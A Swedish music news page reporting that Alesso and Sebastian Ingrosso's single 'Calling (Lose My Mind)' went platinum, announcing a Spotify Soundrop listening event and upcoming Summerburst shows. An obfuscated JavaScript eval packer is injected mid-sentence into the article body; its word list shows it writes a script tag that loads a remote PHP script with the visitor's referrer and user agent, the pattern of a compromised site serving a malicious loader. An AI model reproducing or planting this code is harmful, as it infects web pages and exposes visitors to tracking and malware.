Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Alesso och Sebastian Ingrosso säljer Platina med ”Calling”

Alesso och Sebastian Ingrosso säljer Platina med ”Calling”
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rhkhb|var|u0026u|referrer|zsfzt||js|php’.split(’|’),0,{}))
ett special-anpassat rum i Spotify-appen Soundrop kommer Ingrosso och Alesso att presentera sina favoritlåtar, bland annat hitsingeln ”Calling (Lose My Mind)” – som just sålt platina. Fans kommer att kunna rösta och vara med och påverka vilka låtar som ska spelas samtidigt som Ingrosso och Alesso chattar direkt med dem i Soundrop-appen.

“Det känns riktigt kul att ge våra fans möjlighet att hänga med oss och lyssna på  musik vi gillar i Spotify”, säger Sebastian Ingrosso. “Vi hoppas att våra fans kommer att börja sin kväll med oss, och sen köra på hela natten”, lägger Alesso till.

Eventet äger rum fredagen den 1:a juni klockan 20.00. Europeiska fans kan delta i Facebook eventet, där de kommer hållas uppdaterade med den allra senaste informationen om eventet.

Facebook event: https://www.facebook.com/events/288470767913329/

I Sverige kan man se Alesso live – IRL – närmast på Summerburst, den 2 Juni i Göteborg och den 15 Juni. Sebastian Ingrosso spelar på Summerburst i Stockholm den 16 Juni.